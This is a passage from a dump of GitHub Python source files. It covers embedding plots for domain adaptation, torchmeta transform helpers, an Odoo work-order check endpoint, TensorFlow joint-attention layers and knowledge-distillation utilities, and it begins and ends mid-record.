'#008cff', '#004c8b', '#00325c',\n '#FFB56B', '#ff8000', '#964b00', '#e41a1c',\n '#8BDD89', \"#04b000\", \"#026b00\", \"#008DF9\",\n \"#faa5f3\", \"#de4bd2\", \"#ad17a1\", \"#570950\",\n '#fa7f7f', '#fc3838', '#a80707', '#732929']\n\n # If there are more than 3 types of labels, we want to plot both cohort, and domains, so change color scheme.\n color_list = color_list2 if len(list(set(labels))) > config[\"n_cohorts\"] + 1 else color_list\n\n # Map class to legend texts. \"A1\" = Cohort-A in Domain-1\n c2l = {\"0\": \"A1\", \"1\": \"A2\", \"2\": \"A3\", \"3\": \"A4\",\n \"4\": \"B1\", \"5\": \"B2\", \"6\": \"B3\", \"7\": \"B4\",\n \"8\": \"C1\", \"9\": \"C2\", \"10\": \"C3\", \"11\": \"C4\",\n \"12\": \"D1\", \"13\": \"D2\", \"14\": \"D3\", \"15\": \"D4\",\n \"16\": \"E1\", \"17\": \"E2\", \"18\": \"E3\", \"19\": \"E4\", }\n\n # Used to adjust space for legends based on number of columns in the legend. ncol: subplot_adjust\n legend_space_adjustment = {\"1\": 0.9, \"2\": 0.9, \"3\": 0.75, \"4\": 0.65, \"5\": 0.65}\n\n # Initialize an empty dictionary to hold the mapping for color palette\n palette = {}\n # Map colors to the indexes.\n for i in range(len(color_list)):\n palette[str(i)] = color_list[i]\n # Make sure that the labels are 1D arrays\n y = labels.reshape(-1, )\n # Turn labels to a list\n y = list(map(str, y.tolist()))\n # Define number of sub-plots to draw. In this case, 2, one for PCA, and one for t-SNE\n img_n = 2\n # Initialize subplots\n fig, axs = plt.subplots(1, img_n, figsize=(12, 3.5), facecolor='w', edgecolor='k')\n # Adjust the whitespace around sub-plots\n fig.subplots_adjust(hspace=.1, wspace=.1)\n # adjust the ticks of axis.\n plt.tick_params(\n axis='both', # changes apply to the x-axis\n which='both',\n left=False, # both major and minor ticks are affected\n right=False,\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n\n # Flatten axes if we have more than 1 plot. Or, return a list of 2 axs to make it compatible with multi-plot case.\n axs = axs.ravel() if img_n > 1 else [axs, axs]\n\n # Get 2D embeddings, using PCA\n pca = PCA(n_components=2)\n # Fit training data and transform\n embeddings_pca = pca.fit_transform(embeddings) # if embeddings.shape[1]>2 else embeddings\n # Set the title of the sub-plot\n axs[0].title.set_text('Embeddings from PCA')\n # Plot samples, using each class label to define the color of the class.\n sns_plt = sns.scatterplot(x=embeddings_pca[:, 0], y=embeddings_pca[:, 1], ax=axs[0], palette=palette, hue=y, s=20,\n alpha=alpha)\n # Overwrite legend labels\n overwrite_legends(sns_plt, c2l, fig, ncol=ncol, title=legend_title, labels=legend_labels)\n # Get 2D embeddings, using t-SNE\n embeddings_tsne = tsne(embeddings) # if embeddings.shape[1]>2 else embeddings\n # Set the title of the sub-plot\n axs[1].title.set_text('Embeddings from t-SNE')\n # Plot samples, using each class label to define the color of the class.\n sns_plt = sns.scatterplot(x=embeddings_tsne[:, 0], y=embeddings_tsne[:, 1], ax=axs[1], palette=palette, hue=y, s=20,\n alpha=alpha)\n # Overwrite legend labels\n overwrite_legends(sns_plt, c2l, fig, ncol=ncol, title=legend_title, labels=legend_labels)\n # Remove legends in sub-plots\n axs[0].get_legend().remove()\n axs[1].get_legend().remove()\n # Adjust the scaling factor to fit your legend text completely outside the plot\n # (smaller value results in more space being made for the legend)\n plt.subplots_adjust(right=legend_space_adjustment[str(ncol)])\n\n # Get the path to the project root\n root_path = os.path.dirname(os.path.dirname(__file__))\n # Define the path to save the plot to.\n fig_path = os.path.join(root_path, \"results\", config[\"framework\"], \"evaluation\", \"clusters\", plt_name + \".png\")\n # Define tick params\n plt.tick_params(axis=u'both', which=u'both', length=0)\n # Save the plot\n plt.savefig(fig_path, bbox_inches=\"tight\")\n # Clear figure just in case if there is a follow-up plot.\n plt.clf()\n\n\ndef overwrite_legends(sns_plt, c2l, fig, ncol, title=None, labels=None):\n # Get legend handles and labels\n handles, legend_txts = sns_plt.get_legend_handles_labels()\n # Turn str to int before sorting ( to avoid wrong sort order such as having '10' in front of '4' )\n legend_txts = [int(d) for d in legend_txts]\n # Sort both handle and texts so that they show up in a alphabetical order on the plot\n legend_txts, handles = (list(t) for t in zip(*sorted(zip(legend_txts, handles))))\n # Turn int to str before using labels\n legend_txts = [str(i) for i in legend_txts]\n # Get new legend labels using class-to-label map\n new_labels = [c2l[legend_text] for legend_text in legend_txts]\n # Overwrite new_labels if it is given by user.\n new_labels = labels or new_labels\n # Define the figure title\n title = title or \"Cohorts/Domains\"\n # Overwrite the legend labels and add a title to the legend\n fig.legend(handles, new_labels, loc=\"center right\", borderaxespad=0.1, title=title, ncol=ncol)\n sns_plt.set(xticklabels=[], yticklabels=[], xlabel=None, ylabel=None)\n sns_plt.tick_params(top=False, bottom=False, left=False, right=False)\n\n\ndef domain_labels_for_tranlation(options, domain_label=[2]):\n # Assign each domain to a label: domain-1:0, domain-2:1 and so on.\n domain_labels = []\n # Repeat each for number of batch size so that we have label for each data point from each domain\n domain_labels = options[\"n_domains\"] * options[\"batch_size\"] * domain_label\n # Turn labels to torch tensor\n domain_labels = th.from_numpy(np.array(domain_labels))\n # Turn them into one-hot embeddings, shape: (3 x batch_size, number of domains)\n y = th.eye(options[\"n_domains\"])\n # Return one-hot encoded domain labels\n return y[domain_labels].to(options[\"device\"])\n\n\ndef save_np2csv(np_list, save_as=\"test.csv\"):\n # Get numpy arrays and label lists\n Xtr, ytr = np_list\n # Turn label lists into numpy arrays\n ytr = np.array(ytr, dtype=np.int8)\n # Get column names\n columns = [\"label\"] + list(map(str, list(range(Xtr.shape[1]))))\n\n # Concatenate \"scaled\" features and labels\n data_tr = np.concatenate((ytr.reshape(-1, 1), Xtr), axis=1)\n # Generate new dataframes with \"scaled features\" and labels\n df_tr = pd.DataFrame(data=data_tr, columns=columns)\n # Show samples from scaled data\n print(\"Samples from the dataframe:\")\n print(df_tr.head())\n # Save the dataframe as csv file\n df_tr.to_csv(save_as, index=False)\n # Print an informative message\n print(f\"The dataframe is saved as {save_as}\")\n\n\ndef append_tensors_to_lists(list_of_lists, list_of_tensors):\n # Go through each tensor and corresponding list\n for i in range(len(list_of_tensors)):\n # Convert tensor to numpy and append it to the corresponding list\n list_of_lists[i] += [list_of_tensors[i].cpu().numpy()]\n # Return the lists\n return list_of_lists\n\n\ndef concatenate_lists(list_of_lists):\n list_of_np_arrs = []\n # Pick a list of numpy arrays ([np_arr1, np_arr2, ...]), concatenate numpy arrs to a single one (np_arr_big),\n # and append it back to the list ([np_arr_big1, np_arr_big2, ...])\n for list_ in list_of_lists:\n list_of_np_arrs.append(np.concatenate(list_))\n # Return numpy arrays\n return list_of_np_arrs\n\n\ndef get_translated_outputs(Xtran, dlabels_raw):\n return Xtran[dlabels_raw == 0], Xtran[dlabels_raw == 1], Xtran[dlabels_raw == 2]\n\n","repo_name":"talipucar/DomainAdaptation","sub_path":"utils/eval_utils.py","file_name":"eval_utils.py","file_ext":"py","file_size_in_byte":15711,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"13173807586","text":"from torchvision.transforms import Compose\nfrom torchmeta.utils.data.task import Task\n\ndef apply_wrapper(wrapper, task_or_dataset=None):\n if task_or_dataset is None:\n return wrapper\n\n from torchmeta.utils.data import MetaDataset\n if isinstance(task_or_dataset, Task):\n return wrapper(task_or_dataset)\n elif isinstance(task_or_dataset, MetaDataset):\n if task_or_dataset.dataset_transform is None:\n dataset_transform = wrapper\n else:\n dataset_transform = Compose([\n task_or_dataset.dataset_transform, wrapper])\n task_or_dataset.dataset_transform = dataset_transform\n return task_or_dataset\n else:\n raise NotImplementedError()\n\ndef wrap_transform(transform, fn, transform_type=None):\n if (transform_type is None) or isinstance(transform, transform_type):\n return fn(transform)\n elif isinstance(transform, Compose):\n return Compose([wrap_transform(subtransform, fn, transform_type)\n for subtransform in transform.transforms])\n else:\n return transform\n","repo_name":"tristandeleu/pytorch-meta","sub_path":"torchmeta/transforms/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":1879,"dataset":"github-code","pt":"3"} +{"seq_id":"9521527427","text":"import xmlrpc.client\nfrom .tl_api_signin import apisignin \nfrom odoo import http, _, exceptions , api, SUPERUSER_ID, models, fields\nimport json \n \nclass apicheckwo(http.Controller): \n def checkkw(self, kw): \n resultcode = 201\n creds = apisignin.get_credentials()\n gettoken = kw.get('token') ; getwoid =kw.get('woid'); getclientid = kw.get('client_id'); getsecretkey =kw.get('secret_key'); db_name = http.request.session.db \n result = True ; msg ='' ; header_fields = [] ; loginstate ='' ; ResUsersInstance = False\n userid = False ; url = 'http://127.0.0.1' \n mandatory_header = ['client_id','secret_key','token','scanresult', 'woid'] \n for mandatory_field in mandatory_header: \n if not kw.get(mandatory_field,False): header_fields.append(mandatory_field) \n if len(header_fields) > 0 : result = False; msg = \"(miss header %s\" %str(header_fields)+\")\" ; return result,resultcode, msg,False,False\n if getsecretkey != creds['secret_key'] : result = False; msg = \"(wrong secret_key)\" ; return result,resultcode, msg,False,False\n if getclientid != creds['client_id'] : result = False; msg = \"(ass wrong client_id)\" ; return result,resultcode, msg,False,False\n if len(gettoken) != 40 : result = False; msg = \"(token is in wrong format)\" ; return result,301 , msg,False,False\n ResUsersInstance = http.request.env['res.users'].sudo().search([('customtoken', '=', gettoken)])\n if ResUsersInstance.id == False : result = False; msg = \"(token: user not found)\" ; return result,301 , msg,False,False \n tokenowner = ResUsersInstance.login \n url = http.request.env['ir.config_parameter'].sudo().get_param('web.base.url') \n common = xmlrpc.client.ServerProxy('{}/xmlrpc/2/common'.format(url)) \n try: \n userid = common.authenticate(db_name, tokenowner, gettoken, {})\n except Exception as e:\n result = False; msg = \"(common.userid: failed to authenticate token and user)\" +str(e) ; return result,resultcode, msg,False,False\n datawo = http.request.env['tl.tr.draftwo'].sudo().search([('dwoid', '=', getwoid)])\n if len(datawo) == 0 : result = False;msg = \"(wo (\"+getwoid+\") return 0 row.)\" ; return result,resultcode, msg,False,False \n return result,resultcode,msg,ResUsersInstance,datawo\n\n @http.route('/api/checkWO/', methods=['POST'],type='http',auth='none', csrf=False) \n def checkwo(self, **kw): \n result, resultcode, errormsg, ResUsersInstance , datawo= self.checkkw(kw) \n dict={} \n if (result == False):\n dict={\"code\": resultcode, \"message\": \"Transaction Halted:\"+errormsg} \n kw =json.dumps(dict) \n return kw \n else: \n scanresult = kw.get('scanresult') \n datasesuai = False\n for record in datawo: \n if scanresult in ['record.chassisno, record.engineno']:\n # if scanresult in ['8998989100120']: \n datasesuai = True \n if (datasesuai) : return json.dumps({\"code\": 200, \"message\": \"data sesuai\" }) \n else : return json.dumps({\"code\": 201, \"message\": \"data tidak sesuai\"}) \n","repo_name":"erickindratara/tlsystem_clone","sub_path":"controllers/tl_api_checkwo.py","file_name":"tl_api_checkwo.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28210867233","text":"import tensorflow as tf\ndef shape_list(x):\n \"\"\"Return list of dims, statically where possible.\"\"\"\n x = tf.convert_to_tensor(x)\n # If unknown rank, return dynamic shape\n if x.get_shape().dims is None:\n return tf.shape(x)\n static = x.get_shape().as_list()\n shape = tf.shape(x)\n\n ret = []\n for i, dim in enumerate(static):\n if dim is None:\n dim = shape[i]\n ret.append(dim)\n return ret\nclass Attention(tf.keras.layers.Layer):\n \"\"\"Multi-headed attention layer.\"\"\"\n\n def __init__(self, hidden_size, num_heads, attention_dropout,return_attention=False):\n \"\"\"Initialize Attention.\n Args:\n hidden_size: int, output dim of hidden layer.\n num_heads: int, number of heads to repeat the same attention structure.\n attention_dropout: float, dropout rate inside attention for training.\n \"\"\"\n if hidden_size % num_heads:\n raise ValueError(\n \"Hidden size ({}) must be divisible by the number of heads ({}).\"\n .format(hidden_size, num_heads))\n\n super(Attention, self).__init__()\n self.hidden_size = hidden_size\n self.num_heads = num_heads\n self.attention_dropout = attention_dropout\n self.return_attention = return_attention\n\n def build(self, input_shape):\n \"\"\"Builds the layer.\"\"\"\n # Layers for linearly projecting the queries, keys, and values.\n self.q_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"q\")\n self.k_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"k\")\n self.v_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"v\")\n self.output_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"output_transform\")\n super(Attention, self).build(input_shape)\n\n def get_config(self):\n return {\n \"hidden_size\": self.hidden_size,\n \"num_heads\": self.num_heads,\n \"attention_dropout\": self.attention_dropout,\n 'return_attention':self.return_attention\n }\n\n def split_heads(self, x):\n \"\"\"Split x into different heads, and transpose the resulting value.\n The tensor is transposed to insure the inner dimensions hold the correct\n values during the matrix multiplication.\n Args:\n x: A tensor with shape [batch_size, length, hidden_size]\n Returns:\n A tensor with shape [batch_size, num_heads, length, hidden_size/num_heads]\n \"\"\"\n with tf.name_scope(\"split_heads\"):\n batch_size = tf.shape(x)[0]\n length = tf.shape(x)[1]\n\n # Calculate depth of last dimension after it has been split.\n depth = (self.hidden_size // self.num_heads)\n\n # Split the last dimension\n x = tf.reshape(x, [batch_size, length, self.num_heads, depth])\n\n # Transpose the result\n return tf.transpose(x, [0, 2, 1, 3])\n\n def combine_heads(self, x):\n \"\"\"Combine tensor that has been split.\n Args:\n x: A tensor [batch_size, num_heads, length, hidden_size/num_heads]\n Returns:\n A tensor with shape [batch_size, length, hidden_size]\n \"\"\"\n with tf.name_scope(\"combine_heads\"):\n batch_size = tf.shape(x)[0]\n length = tf.shape(x)[2]\n x = tf.transpose(x, [0, 2, 1, 3]) # --> [batch, length, num_heads, depth]\n return tf.reshape(x, [batch_size, length, self.hidden_size])\n\n def call(self, x, y, bias, training, cache=None,save_weights_to=None,return_attention=False):\n \"\"\"Apply attention mechanism to x and y.\n Args:\n x: a tensor with shape [batch_size, length_x, hidden_size]\n y: a tensor with shape [batch_size, length_y, hidden_size]\n bias: attention bias that will be added to the result of the dot product.\n training: boolean, whether in training mode or not.\n cache: (Used during prediction) dictionary with tensors containing results\n of previous attentions. The dictionary must have the items:\n {\"k\": tensor with shape [batch_size, i, key_channels],\n \"v\": tensor with shape [batch_size, i, value_channels]}\n where i is the current decoded length.\n Returns:\n Attention layer output with shape [batch_size, length_x, hidden_size]\n \"\"\"\n # Linearly project the query (q), key (k) and value (v) using different\n # learned projections. This is in preparation of splitting them into\n # multiple heads. Multi-head attention uses multiple queries, keys, and\n # values rather than regular attention (which uses a single q, k, v).\n q = self.q_dense_layer(x)\n k = self.k_dense_layer(y)\n v = self.v_dense_layer(y)\n\n if cache is not None:\n # Combine cached keys and values with new keys and values.\n k = tf.concat([tf.cast(cache[\"k\"], k.dtype), k], axis=1)\n v = tf.concat([tf.cast(cache[\"v\"], k.dtype), v], axis=1)\n\n # Update cache\n cache[\"k\"] = k\n cache[\"v\"] = v\n\n # Split q, k, v into heads.\n q = self.split_heads(q)\n k = self.split_heads(k)\n v = self.split_heads(v)\n\n # Scale q to prevent the dot product between q and k from growing too large.\n depth = (self.hidden_size // self.num_heads)\n q *= depth ** -0.5\n\n # Calculate dot product attention\n logits = tf.matmul(q, k, transpose_b=True)\n #print(logits.shape)\n #print(bias.shape)\n if bias is not None:\n logits += bias\n #print(logits.shape)\n \n # Note that softmax internally performs math operations using float32\n # for numeric stability. When training with float16, we keep the input\n # and output in float16 for better performance.\n weights = tf.nn.softmax(logits, name=\"attention_weights\")\n if training:\n weights = tf.nn.dropout(weights, rate=self.attention_dropout)\n attention_output = tf.matmul(weights, v)\n\n # Recombine heads --> [batch_size, length, hidden_size]\n attention_output = self.combine_heads(attention_output)\n\n # Run the combined outputs through another linear projection layer.\n attention_output = self.output_dense_layer(attention_output)\n output=None\n if not return_attention:\n output=attention_output\n else:\n batch_size,nh,s1,s2=shape_list(weights)\n weights= tf.reshape(weights, [batch_size,s1,s2*nh])\n output=[attention_output,weights]\n return output\n\n\nclass SelfAttention(Attention):\n \"\"\"Multiheaded self-attention layer.\"\"\"\n def call(self, x, bias, training, cache=None,return_attention=False):\n \n return super(SelfAttention, self).call(x, x, bias, \n training, \n cache,\n return_attention=return_attention)\n\n\n## Joint Attention layer\nimport tensorflow as tf\nclass JASSAttentionLayer(tf.keras.layers.Layer):\n def maskJassLayer(self,layer,attention_weight):\n # Mask out the layer \n mask = np.ones(shape=attention_weight.shape,dtype=np.float32)\n mask[:,layer,:,:,:]= np.zeros_like(mask[:,layer,:,:,:])\n layer_mask = tf.convert_to_tensor(mask)\n attention_weight*=layer_mask\n return attention_weight\n\n def __init__(self, \n hidden_size, \n num_heads, \n attention_dropout,\n nb_links,\n computation_mode=1,\n share_weights=False,\n share_query_weights=True,\n return_attention=False,\n ):\n if hidden_size % num_heads:\n raise ValueError(\n \"Hidden size ({}) must be divisible by the number of heads ({}).\"\n .format(hidden_size, num_heads))\n super(JASSAttentionLayer, self).__init__()\n self.hidden_size = hidden_size\n self.num_heads = num_heads\n self.attention_dropout = attention_dropout\n self.return_attention = return_attention\n self.computation_mode=computation_mode\n self.nb_links = nb_links\n self.share_weights = share_weights\n self.share_query_weights= share_query_weights\n self.is_hybrid = False\n \n print('Using normal JASS mode')\n if self.computation_mode not in [1,2,3,4,]:\n raise ValueError(\n \"Invalid Attention computation mode: choose from [1,2,3,4]\")\n \n \n def build(self, input_shape):\n \"\"\"Builds the layer.\"\"\"\n # Layers for linearly projecting the queries, keys, and values.\n self.q_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"q\") if self.share_query_weights else [tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"q_\"+str(i)) for i in range(self.nb_links)]\n self.output_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"output_transform\")\n \n if self.share_weights:\n self.k_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"k\")\n self.v_dense_layer = tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"v\")\n else:\n self.k_dense_layer = [tf.keras.layers.Dense(\n self.hidden_size, use_bias=False, name=\"k_\"+str(i)) for i in range(self.nb_links)]\n self.v_dense_layer = [tf.keras.layers.Dense(\n self.hidden_size, use_bias=False,name=\"v_\"+str(i)) for i in range(self.nb_links)]\n super(JASSAttentionLayer, self).build(input_shape)\n def get_config(self):\n return {\n 'nb_links':self.nb_links,\n 'computation_mode':self.computation_mode,\n \"hidden_size\": self.hidden_size,\n \"num_heads\": self.num_heads,\n \"attention_dropout\": self.attention_dropout,\n 'return_attention':self.return_attention\n }\n \n def split_heads(self, x):\n \"\"\"Split x into different heads, and transpose the resulting value.\n The tensor is transposed to insure the inner dimensions hold the correct\n values during the matrix multiplication.\n Args:\n x: A tensor with shape [batch_size, length, hidden_size]\n Returns:\n A tensor with shape [batch_size, num_heads, length, hidden_size/num_heads]\n \"\"\"\n with tf.name_scope(\"split_heads\"):\n batch_size = tf.shape(x)[0]\n length = tf.shape(x)[1]\n\n # Calculate depth of last dimension after it has been split.\n depth = (self.hidden_size // self.num_heads)\n\n # Split the last dimension\n x = tf.reshape(x, [batch_size, length, self.num_heads, depth])\n\n # Transpose the result\n return tf.transpose(x, [0, 2, 1, 3])\n \n \n def combine_heads(self, x):\n with tf.name_scope(\"combine_heads\"):\n batch_size = tf.shape(x)[0]\n length = tf.shape(x)[3]\n x = tf.transpose(x, [0, 3, 1, 2,4]) # --> [batch, length,num_links, num_heads, depth]\n #if not self.is_hybrid:\n if self.computation_mode in [1,3]:\n return tf.reshape(x, [batch_size, length, self.hidden_size])\n else:\n vv= tf.reshape(x, [batch_size, length, self.hidden_size*self.nb_links]) \n return vv\n #else:\n # if self.computation_mode in [1,3]:\n # return tf.reshape(x, [batch_size, length, 2*self.hidden_size])\n # else:\n # vv= tf.reshape(x, [batch_size, length, 2*self.hidden_size*self.nb_links]) \n return vv\n \n def call(self, x, y, bias, training, cache=None,save_weights_to=None,return_attention=False):\n computation_mode = self.computation_mode\n k= y\n v= y\n if self.share_query_weights:\n q = tf.expand_dims(self.split_heads(self.q_dense_layer(x)),1) #(bs,1,nb_heads,seq_len,depth)\n else:\n q = [tf.expand_dims(self.split_heads(self.q_dense_layer[index](x)),1) for index, vv in enumerate(k)]\n q = tf.concat(q,1) if len(q)>1 else q[-1]\n \n if self.share_weights:\n ks = [tf.expand_dims(self.split_heads(self.k_dense_layer(vv)),1) for index, vv in enumerate(k)]\n vs = [tf.expand_dims(self.split_heads(self.v_dense_layer(vv)),1) for index, vv in enumerate(v)]\n else:\n ks = [tf.expand_dims(self.split_heads(self.k_dense_layer[index](vv)),1) for index, vv in enumerate(k)]\n vs = [tf.expand_dims(self.split_heads(self.v_dense_layer[index](vv)),1) for index, vv in enumerate(v)]\n \n ks = tf.concat(ks,1) if len(ks)>1 else ks[-1] #(bs,nb_layers,nb_heads,seq_len,depth)\n vs = tf.concat(vs,1) if len(vs)>1 else vs[-1] #(bs,nb_layers,nb_heads,seq_len,depth)\n \n depth = (self.hidden_size // self.num_heads)\n q *= depth ** -0.5\n \n # Calculate dot product attention\n logits = tf.matmul(q, ks, transpose_b=True)\n if bias is not None:\n modif_bias = tf.expand_dims(bias,1)\n modif_bias = tf.concat([modif_bias for _ in range(len(v))],1)\n logits += modif_bias\n \n if computation_mode in [1,2]:\n joint_logits = tf.expand_dims(tf.reduce_sum(logits,axis=1),1)\n joint_weight = tf.nn.softmax(joint_logits, name=\"j_attention_weights\")\n if training:\n joint_weight = tf.nn.dropout(joint_weight, rate=self.attention_dropout)\n weights= joint_weight\n else:\n weights = tf.nn.softmax(logits, name=\"attention_weights\")\n if training:\n weights = tf.nn.dropout(weights, rate=self.attention_dropout)\n attention_output = tf.matmul(weights, vs)\n\n if computation_mode in [1,3]:\n attention_output= tf.expand_dims(tf.reduce_sum(attention_output,1),1)\n\n attention_output = self.combine_heads(attention_output)\n #print(attention_output.shape)\n attention_output = self.output_dense_layer(attention_output)\n #print(attention_output.shape,'Not hybrid')\n output=None\n if not return_attention:\n output=attention_output\n else:\n batch_size,nb_links,nh,s1,s2=shape_list(logits)\n weights= tf.reshape(logits, [batch_size,s1,nh,nb_links,s2])\n output=[attention_output,weights]\n return output","repo_name":"kaeflint/MLMHA","sub_path":"layers/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":14416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6873095996","text":"import torch\nfrom collections import OrderedDict,abc\nfrom tqdm import tqdm\nfrom torch import nn\ntry:\n from tensorboardX import SummaryWriter\nexcept ImportError:\n from torch.utils.tensorboard import SummaryWriter\nimport os, random, json\nimport numpy as np\nimport logging\nfrom typing import Optional, Dict, Union\nfrom .presets import *\nfrom .configurations import TrainingConfig, DistillationConfig\nimport random\nfrom .compatibility import mask_dtype, is_apex_available\n\nhas_apex = is_apex_available()\nif has_apex:\n from apex import amp\n\n\nlogger = logging.getLogger(\"Distillation\")\n#logger.setLevel(logging.INFO)\n\n#handler_stream = logging.StreamHandler()\n#handler_stream.setLevel(logging.INFO)\n#formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%Y/%m/%d %H:%M:%S')\n#handler_stream.setFormatter(formatter)\n#logger.addHandler(handler_stream)\n\nclass CustomMatch:\n def __init__(self, module_T, module_S, weight, loss,\n proj_func =None, proj_group = None):\n self.module_T = module_T\n self.module_S = module_S\n self.loss = loss,\n self.weight = weight,\n self.proj_func = proj_func\n if proj_group is None:\n self.proj_group = dict()\n else:\n self.proj_group = proj_group\n def to_dict(self):\n return {'module_T':self.module_T,\n 'module_S':self.module_S,\n 'weight':self.weight,\n 'loss':self.loss,\n 'proj_func':self.proj_func,\n 'proj_group':self.proj_group}\n @classmethod\n def from_dict(cls,dict_object):\n return cls(**dict_object)\n\n\nclass DistillationContext:\n def __init__(self):\n self.model_S = None\n self.model_T = None\n def __enter__(self):\n if isinstance(self.model_T,(list,tuple)):\n self.model_T_is_training = [model_t.training for model_t in self.model_T]\n for model_t in self.model_T:\n model_t.eval()\n elif isinstance(self.model_T,dict):\n self.model_T_is_training = {name:model.training for name,model in self.model_T.items()}\n for name in self.model_T:\n self.model_T[name].eval()\n else:\n self.model_T_is_training = self.model_T.training\n self.model_T.eval()\n\n if isinstance(self.model_S,(list,tuple)):\n self.model_S_is_training = [model_s.training for model_s in self.model_S]\n for model_s in self.model_S:\n model_s.eval()\n elif isinstance(self.model_S,dict):\n self.model_S_is_training = {name:model.training for name,model in self.model_S.items()}\n for name in self.model_S:\n self.model_S[name].eval()\n else:\n self.model_S_is_training = self.model_S.training\n self.model_S.train()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n #Restore model status\n if isinstance(self.model_T,(list,tuple)):\n for i in range(len(self.model_T_is_training)):\n self.model_T[i].train(self.model_T_is_training[i])\n elif isinstance(self.model_T,dict):\n for name,is_training in self.model_T_is_training.items():\n self.model_T[name].train(is_training)\n else:\n self.model_T.train(self.model_T_is_training)\n\n if isinstance(self.model_S,(list,tuple)):\n for i in range(len(self.model_S_is_training)):\n self.model_S[i].train(self.model_S_is_training[i])\n elif isinstance(self.model_S,dict):\n for name,is_training in self.model_S_is_training.items():\n self.model_S[name].train(is_training)\n else:\n self.model_S.train(self.model_S_is_training)\n\n\nclass AbstractDistiller(DistillationContext):\n def __init__(self, train_config: TrainingConfig,\n distill_config: DistillationConfig,\n model_T, model_S, adaptor_T, adaptor_S):\n super(AbstractDistiller, self).__init__()\n self.t_config = train_config\n self.d_config = distill_config\n\n self.model_T = model_T\n self.model_S = model_S\n self.adaptor_S = adaptor_S\n self.adaptor_T = adaptor_T\n\n self.kd_loss = KD_LOSS_MAP[self.d_config.kd_loss_type]\n\n self.local_rank = self.t_config.local_rank\n self.rank = 0\n if self.local_rank != -1:\n self.rank = torch.distributed.get_rank()\n if self.t_config.log_dir is not None and self.rank == 0:\n self.tb_writer = SummaryWriter(log_dir = self.t_config.log_dir)\n else:\n self.tb_writer = no_op\n \n self.print_freq = 20\n\n self.logits_cache = []\n\n\ndef select_logits_with_mask(logits_list, masks_list):\n output_logits = []\n if len(masks_list)==len(logits_list):\n for logits,mask in zip(logits_list,masks_list):\n if len(logits.shape)==3:\n mask = mask.unsqueeze(-1).expand_as(logits).to(mask_dtype)\n logits_select = torch.masked_select(logits,mask).view(-1,logits.size(-1))\n else:\n logits_select = logits #Logits_mask has no effect on logits of shape (batch_size, logits_to_be_softmaxed)\n output_logits.append(logits_select)\n elif len(masks_list)==1:\n mask = masks_list[0]\n for logits in logits_list:\n if len(logits.shape)==3:\n mask = mask.unsqueeze(-1).expand_as(logits).to(mask_dtype)\n logits_select = torch.masked_select(logits,mask).view(-1,logits.size(-1))\n else:\n logits_select = logits #Logits_mask has no effect on logits of shape (batch_size, logits_to_be_softmaxed)\n output_logits.append(logits_select)\n else:\n raise AssertionError(\"lengths of logits list and masks list mismatch\")\n return output_logits\n\n\nclass BasicAdaptor:\n def __init__(self):\n self.batch = None\n self.model_outputs = None\n def __call__(self,batch,model_outputs):\n self.batch = batch\n self.model_outputs = model_outputs\n def __getattr__(self, item):\n raise NotImplementedError\n\n\ndef post_adaptor(dict_object):\n if 'logits' in dict_object:\n logits = dict_object['logits']\n if not isinstance(logits,(list,tuple)):\n dict_object['logits'] = [ logits ]\n if 'logits_mask' in dict_object:\n logits_mask = dict_object['logits_mask']\n if not isinstance(logits_mask,(list,tuple)):\n dict_object['logits_mask'] = [ logits_mask ]\n if 'losses' in dict_object:\n losses = dict_object['losses']\n if not isinstance(losses,(list,tuple)):\n dict_object['losses'] = [ losses ]\n if 'labels' in dict_object:\n labels = dict_object['labels']\n if not isinstance(labels,(list,tuple)):\n dict_object['labels'] = [ labels ]\n return dict_object\n\n\ndef probability_shift_(tensor, labels): # In-place operation. shape (batch_size, num_classes), (batch_size,)\n if len(tensor.shape)==2:\n max_position = tensor.argmax(dim=-1) # shape (batch_size,)\n index = torch.arange(tensor.size(0)).to(tensor.device)\n max_clone = tensor[index,max_position].clone()\n truth_clone = tensor[index,labels].clone()\n\n tensor[index,max_position] = truth_clone\n tensor[index,labels] = max_clone\n return tensor\n\n elif len(tensor.shape)==3: # shape (batch_size, length, num_classes)\n original_shape = tensor.size()\n\n tensor = tensor.view(-1,tensor.size(-1)) # (batch_size * length, num_classes)\n\n max_position = tensor.argmax(dim=-1) # shape (batch_size * length, )\n labels = labels.view(-1) # (batch_size * length, )\n nonneg_labels = torch.where(labels<0, max_position, labels)\n\n index = torch.arange(tensor.size(0)).to(tensor.device) # (batch_size * length)\n\n max_clone = tensor[index,max_position].clone()\n truth_clone = tensor[index,nonneg_labels].clone()\n\n tensor[index,max_position] = truth_clone\n tensor[index,nonneg_labels] = max_clone\n tensor = tensor.view(original_shape)\n return tensor\n else:\n raise TypeError(\"Rank of tensor must be 2 or 3\")\n\nclass no_op:\n @staticmethod\n def add_scalar(*args, **kwargs):\n pass\n\ndef move_to_device(batch, device):\n r\"\"\"Puts each data field to the device\"\"\"\n if isinstance(batch, torch.Tensor):\n return batch.to(device)\n elif isinstance(batch,(list,tuple)):\n return tuple(move_to_device(item,device) for item in batch)\n elif isinstance(batch, abc.Mapping):\n return {key: move_to_device(value,device) for key, value in batch.items()}\n else:\n return batch\n\ndef get_outputs_from_batch(batch, device, model_T, model_S, args, no_teacher_forward=False):\n if isinstance(batch, 